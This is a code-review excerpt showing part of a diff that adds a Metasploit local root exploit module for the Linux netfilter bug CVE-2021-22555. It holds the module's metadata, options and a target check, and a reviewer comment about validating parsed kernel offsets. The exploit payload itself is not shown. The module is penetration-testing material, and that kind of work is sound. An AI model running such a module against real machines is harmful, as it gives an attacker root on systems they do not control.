modules/exploits/linux/local/netfilter_xtables_heap_oob_write_priv_esc.rb

```diff
@@ -0,0 +1,155 @@
+          This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space.
+          Kernels up to 5.11 (including) are vulnerable.
+          More information about vulnerable kernels is
+          available at https://nvd.nist.gov/vuln/detail/CVE-2021-22555#vulnConfigurationsArea
+          "
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Andy Nguyen (theflow@)', # The original author of this exploit
+          'Szymon Janusz',          # The author of this module
+          'bcoles'                  # Updated the C source code to provide more targets
+        ],
+        'DisclosureDate' => '2021-07-07', # YYYY-DD-MM. Public disclosure date
+        'Platform' => 'linux',
+        'Arch' => [ ARCH_X64 ],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ], # The module could fail to get root sometimes.
+          'Stability' => [ OS_RESOURCE_LOSS ], # After too many failed attempts, the system needs to be restarted.
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'References' => [
+          ['CVE', '2021-22555'],
+          ['URL', 'https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+          ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+        ]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/var/tmp']),
+        OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 10])
+      ]
+    )
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def cmd_timeout
+    datastore['CmdTimeout'].to_i
+  end
+
+  def get_external_source_code(cve, file)
+    file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")
+    ::File.binread(file_path)
+  end
+
+  def strip_comments(c_code)
+    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+  end
+
+  def check
+    unless kernel_modules.include? 'ip_tables'
+      vprint_warning('The ip_tables module is not loaded.')
+      return CheckCode::Safe('The ip_tables module is not loaded.')
+    end
+
+    return CheckCode::Safe('LKRG is installed.') if lkrg_installed?
+    return CheckCode::Safe('grsecurity is in use') if grsec_installed?
+
+    release = kernel_release
+    version = "#{release} #{kernel_version.split(' ').first}"
+    ubuntu_offsets = strip_comments(get_external_source_code('CVE-2021-22555', 'exploit.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
+    ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten
```

Comment:
We should probably validate that we've successfully read `ubuntu_kernels` as expected, if it's an empty list - something's gone very wrong with our internal parsing.

Reply:
Added a `fail_with` in that case 👍